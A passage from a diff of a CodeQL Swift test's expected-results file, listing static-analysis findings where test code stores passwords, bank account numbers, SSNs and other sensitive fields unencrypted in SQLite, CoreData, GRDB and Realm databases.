operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | +| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | +| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | +| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | +| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | +| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | +| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | +| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | +| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | +| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | +| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | +| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | +| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | +| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | +| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | +| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | +| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | +| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | +| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | +| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | +| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | +| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | +| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | +| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | +| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | +| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | +| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | +| testGRDB.swift:95:36:95:45 | [...] | testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | +| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | +| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | +| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | +| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:109:53:109:53 | password | password | +| testGRDB.swift:111:51:111:60 | [...] | testGRDB.swift:111:52:111:52 | password | testGRDB.swift:111:51:111:60 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:111:52:111:52 | password | password | +| testGRDB.swift:116:47:116:56 | [...] | testGRDB.swift:116:48:116:48 | password | testGRDB.swift:116:47:116:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:116:48:116:48 | password | password | +| testGRDB.swift:118:47:118:56 | [...] | testGRDB.swift:118:48:118:48 | password | testGRDB.swift:118:47:118:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:118:48:118:48 | password | password | +| testGRDB.swift:121:44:121:53 | [...] | testGRDB.swift:121:45:121:45 | password | testGRDB.swift:121:44:121:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:121:45:121:45 | password | password | +| testGRDB.swift:123:44:123:53 | [...] | testGRDB.swift:123:45:123:45 | password | testGRDB.swift:123:44:123:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:123:45:123:45 | password | password | +| testGRDB.swift:126:44:126:53 | [...] | testGRDB.swift:126:45:126:45 | password | testGRDB.swift:126:44:126:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:126:45:126:45 | password | password | +| testGRDB.swift:128:44:128:53 | [...] | testGRDB.swift:128:45:128:45 | password | testGRDB.swift:128:44:128:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:128:45:128:45 | password | password | +| testGRDB.swift:131:44:131:53 | [...] | testGRDB.swift:131:45:131:45 | password | testGRDB.swift:131:44:131:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:131:45:131:45 | password | password | +| testGRDB.swift:133:44:133:53 | [...] | testGRDB.swift:133:45:133:45 | password | testGRDB.swift:133:44:133:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:133:45:133:45 | password | password | +| testGRDB.swift:138:68:138:77 | [...] | testGRDB.swift:138:69:138:69 | password | testGRDB.swift:138:68:138:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:138:69:138:69 | password | password | +| testGRDB.swift:140:68:140:77 | [...] | testGRDB.swift:140:69:140:69 | password | testGRDB.swift:140:68:140:77 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:140:69:140:69 | password | password | +| testGRDB.swift:143:65:143:74 | [...] | testGRDB.swift:143:66:143:66 | password | testGRDB.swift:143:65:143:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:143:66:143:66 | password | password | +| testGRDB.swift:145:65:145:74 | [...] | testGRDB.swift:145:66:145:66 | password | testGRDB.swift:145:65:145:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:145:66:145:66 | password | password | +| testGRDB.swift:148:65:148:74 | [...] | testGRDB.swift:148:66:148:66 | password | testGRDB.swift:148:65:148:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:148:66:148:66 | password | password | +| testGRDB.swift:150:65:150:74 | [...] | testGRDB.swift:150:66:150:66 | password | testGRDB.swift:150:65:150:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:150:66:150:66 | password | password | +| testGRDB.swift:153:65:153:74 | [...] | testGRDB.swift:153:66:153:66 | password | testGRDB.swift:153:65:153:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:153:66:153:66 | password | password | +| testGRDB.swift:155:65:155:74 | [...] | testGRDB.swift:155:66:155:66 | password | testGRDB.swift:155:65:155:74 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:155:66:155:66 | password | password | +| testGRDB.swift:160:59:160:68 | [...] | testGRDB.swift:160:60:160:60 | password | testGRDB.swift:160:59:160:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:160:60:160:60 | password | password | +| testGRDB.swift:161:50:161:59 | [...] | testGRDB.swift:161:51:161:51 | password | testGRDB.swift:161:50:161:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:161:51:161:51 | password | password | +| testGRDB.swift:164:59:164:68 | [...] | testGRDB.swift:164:60:164:60 | password | testGRDB.swift:164:59:164:68 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:164:60:164:60 | password | password | +| testGRDB.swift:165:50:165:59 | [...] | testGRDB.swift:165:51:165:51 | password | testGRDB.swift:165:50:165:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:165:51:165:51 | password | password | +| testGRDB.swift:169:56:169:65 | [...] | testGRDB.swift:169:57:169:57 | password | testGRDB.swift:169:56:169:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:169:57:169:57 | password | password | +| testGRDB.swift:170:47:170:56 | [...] | testGRDB.swift:170:48:170:48 | password | testGRDB.swift:170:47:170:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:170:48:170:48 | password | password | +| testGRDB.swift:173:56:173:65 | [...] | testGRDB.swift:173:57:173:57 | password | testGRDB.swift:173:56:173:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:173:57:173:57 | password | password | +| testGRDB.swift:174:47:174:56 | [...] | testGRDB.swift:174:48:174:48 | password | testGRDB.swift:174:47:174:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:174:48:174:48 | password | password | +| testGRDB.swift:178:56:178:65 | [...] | testGRDB.swift:178:57:178:57 | password | testGRDB.swift:178:56:178:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:178:57:178:57 | password | password | +| testGRDB.swift:179:47:179:56 | [...] | testGRDB.swift:179:48:179:48 | password | testGRDB.swift:179:47:179:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:179:48:179:48 | password | password | +| testGRDB.swift:182:56:182:65 | [...] | testGRDB.swift:182:57:182:57 | password | testGRDB.swift:182:56:182:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:182:57:182:57 | password | password | +| testGRDB.swift:183:47:183:56 | [...] | testGRDB.swift:183:48:183:48 | password | testGRDB.swift:183:47:183:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:183:48:183:48 | password | password | +| testGRDB.swift:187:56:187:65 | [...] | testGRDB.swift:187:57:187:57 | password | testGRDB.swift:187:56:187:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:187:57:187:57 | password | password | +| testGRDB.swift:188:47:188:56 | [...] | testGRDB.swift:188:48:188:48 | password | testGRDB.swift:188:47:188:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:188:48:188:48 | password | password | +| testGRDB.swift:191:56:191:65 | [...] | testGRDB.swift:191:57:191:57 | password | testGRDB.swift:191:56:191:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:191:57:191:57 | password | password | +| testGRDB.swift:192:47:192:56 | [...] | testGRDB.swift:192:48:192:48 | password | testGRDB.swift:192:47:192:56 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:192:48:192:48 | password | password | +| testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | +| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | +| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | +| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | +| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:210:85:210:85 | password | password | +| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | +| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | +| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | +| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | +| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | +| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | +| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:33:11:33:11 | CCN | CCN | +| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | +| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | +| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | +| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | +| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | +| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | diff --git a/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected b/swift/ql/test/query-tests/Security/CWE-311/CleartextTransmission.expected index fe43c3af8b9b..7665b72b11a6 100644 --- 